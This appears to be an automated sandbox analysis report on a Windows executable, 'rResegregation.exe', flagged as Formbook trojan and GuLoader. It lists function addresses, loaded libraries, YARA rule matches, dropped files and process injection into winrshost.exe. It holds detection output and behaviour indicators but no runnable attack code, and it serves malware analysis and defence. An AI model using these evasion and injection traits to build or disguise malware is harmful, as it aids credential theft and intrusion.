        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378775C62_2_378775C6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787F5C92_2_3787F5C9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788A5262_2_3788A526
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C04452_2_377C0445
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CE3102_2_377CE310
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787F3302_2_3787F330
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B13802_2_377B1380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AD2EC2_2_377AD2EC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787124C2_2_3787124C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF1132_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788010E2_2_3788010E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB1E02_2_377DB1E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785D1302_2_3785D130
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C51C02_2_377C51C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3780717A2_2_3780717A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378770F12_2_378770F1
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CB0D02_2_377CB0D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B00A02_2_377B00A0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786E0762_2_3786E076
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F508C2_2_377F508C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787EFBF2_2_3787EFBF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37871FC62_2_37871FC6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CCF002_2_377CCF00
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C6FE02_2_377C6FE0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787FF632_2_3787FF63
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37870EAD2_2_37870EAD
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E0E502_2_377E0E50
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B2EE82_2_377B2EE8
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37802E482_2_37802E48
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C1EB22_2_377C1EB2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37860E6D2_2_37860E6D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0D692_2_377C0D69
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785FDF42_2_3785FDF4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BAD002_2_377BAD00
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787FD272_2_3787FD27
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C9DD02_2_377C9DD0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37877D4C2_2_37877D4C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2DB02_2_377D2DB0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C3C602_2_377C3C60
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37859C982_2_37859C98
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CAC202_2_377CAC20
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788ACEB2_2_3788ACEB
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B0C122_2_377B0C12
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DFCE02_2_377DFCE0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D8CDF2_2_377D8CDF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786EC4C2_2_3786EC4C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787EC602_2_3787EC60
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37876C692_2_37876C69
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37834BC02_2_37834BC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377FDB192_2_377FDB19
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0B102_2_377C0B10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787FB2E2_2_3787FB2E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787FA892_2_3787FA89
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787CA132_2_3787CA13
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787EA5B2_2_3787EA5B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DFAA02_2_377DFAA0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787E9A62_2_3787E9A6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378059C02_2_378059C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BE9A02_2_377BE9A0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C98702_2_377C9870
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB8702_2_377DB870
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A68682_2_377A6868
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378398B22_2_378398B2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378718DA2_2_378718DA
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EE8102_2_377EE810
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378778F32_2_378778F3
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C38002_2_377C3800
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378608352_2_37860835
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C28C02_2_377C28C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787F8722_2_3787F872
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D68822_2_377D6882
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030EE3105_2_030EE310
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319F3305_2_0319F330
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D13805_2_030D1380
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319124C5_2_0319124C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030CD2EC5_2_030CD2EC
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031A010E5_2_031A010E
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030CF1135_2_030CF113
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0317D1305_2_0317D130
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0312717A5_2_0312717A
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E51C05_2_030E51C0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FB1E05_2_030FB1E0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0318E0765_2_0318E076
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0311508C5_2_0311508C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D00A05_2_030D00A0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030EB0D05_2_030EB0D0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031970F15_2_031970F1
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031967575_2_03196757
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E27605_2_030E2760
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030EA7605_2_030EA760
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FC6005_2_030FC600
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0317D62C5_2_0317D62C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0318D6465_2_0318D646
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031046705_2_03104670
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E06805_2_030E0680
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319A6C05_2_0319A6C0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030DC6E05_2_030DC6E0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319F6F65_2_0319F6F6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031536EC5_2_031536EC
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031AA5265_2_031AA526
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319F5C95_2_0319F5C9
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031975C65_2_031975C6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E04455_2_030E0445
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0314D4805_2_0314D480
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0311DB195_2_0311DB19
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E0B105_2_030E0B10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319FB2E5_2_0319FB2E
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03154BC05_2_03154BC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319CA135_2_0319CA13
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319EA5B5_2_0319EA5B
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319FA895_2_0319FA89
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FFAA05_2_030FFAA0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030DE9A05_2_030DE9A0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319E9A65_2_0319E9A6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031259C05_2_031259C0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0310E8105_2_0310E810
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E38005_2_030E3800
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031808355_2_03180835
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030C68685_2_030C6868
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319F8725_2_0319F872
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E98705_2_030E9870
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FB8705_2_030FB870
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030F68825_2_030F6882
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031598B25_2_031598B2
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031918DA5_2_031918DA
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E28C05_2_030E28C0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031978F35_2_031978F3
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030ECF005_2_030ECF00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319FF635_2_0319FF63
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319EFBF5_2_0319EFBF
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03191FC65_2_03191FC6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E6FE05_2_030E6FE0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03100E505_2_03100E50
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03122E485_2_03122E48
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03180E6D5_2_03180E6D
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03190EAD5_2_03190EAD
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E1EB25_2_030E1EB2
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D2EE85_2_030D2EE8
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030DAD005_2_030DAD00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319FD275_2_0319FD27
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03197D4C5_2_03197D4C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E0D695_2_030E0D69
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030F2DB05_2_030F2DB0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E9DD05_2_030E9DD0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0317FDF45_2_0317FDF4
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D0C125_2_030D0C12
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030EAC205_2_030EAC20
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0318EC4C5_2_0318EC4C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E3C605_2_030E3C60
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03196C695_2_03196C69
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319EC605_2_0319EC60
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03179C985_2_03179C98
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030F8CDF5_2_030F8CDF
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FFCE05_2_030FFCE0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031AACEB5_2_031AACEB
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 377AB910 appears 266 times
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 3782E692 appears 84 times
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 377F5050 appears 36 times
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 3783EF10 appears 104 times
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 37807BE4 appears 87 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 03127BE4 appears 88 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 030CB910 appears 268 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 03115050 appears 36 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 0315EF10 appears 105 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 0314E692 appears 85 times
        Source: rResegregation.exeStatic PE information: invalid certificate
        Source: rResegregation.exe, 00000002.00000003.28842814166.0000000007590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewinrshost.exej% vs rResegregation.exe
        Source: rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rResegregation.exe
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
        Source: rResegregation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal84.troj.evad.winEXE@5/9@2/2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030EC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_0040432F GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040432F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Arsenalers.iniJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Users\user\AppData\Local\Temp\nsjEDD.tmpJump to behavior
        Source: rResegregation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\rResegregation.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: rResegregation.exeReversingLabs: Detection: 44%
        Source: C:\Users\user\Desktop\rResegregation.exeFile read: C:\Users\user\Desktop\rResegregation.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\rResegregation.exe C:\Users\user\Desktop\rResegregation.exe
        Source: C:\Users\user\Desktop\rResegregation.exeProcess created: C:\Users\user\Desktop\rResegregation.exe C:\Users\user\Desktop\rResegregation.exe
        Source: C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exeProcess created: C:\Windows\SysWOW64\winrshost.exe C:\Windows\SysWOW64\winrshost.exe
        Source: C:\Users\user\Desktop\rResegregation.exeProcess created: C:\Users\user\Desktop\rResegregation.exe C:\Users\user\Desktop\rResegregation.exeJump to behavior
        Source: C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exeProcess created: C:\Windows\SysWOW64\winrshost.exe C:\Windows\SysWOW64\winrshost.exeJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeFile written: C:\Windows\hotdoggen.iniJump to behavior
        Source: rResegregation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: winrshost.pdb source: rResegregation.exe, 00000002.00000002.28900231862.000000000758D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: rResegregation.exe, 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28784367288.00000000375D4000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: rResegregation.exe, rResegregation.exe, 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28784367288.00000000375D4000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp, winrshost.exe
        Source: Binary string: mshtml.pdbUGP source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: winrshost.pdbGCTL source: rResegregation.exe, 00000002.00000002.28900231862.000000000758D000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.28752832983.0000000005595000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B08CD push ecx; mov dword ptr [esp], ecx2_2_377B08D6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D08CD push ecx; mov dword ptr [esp], ecx5_2_030D08D6
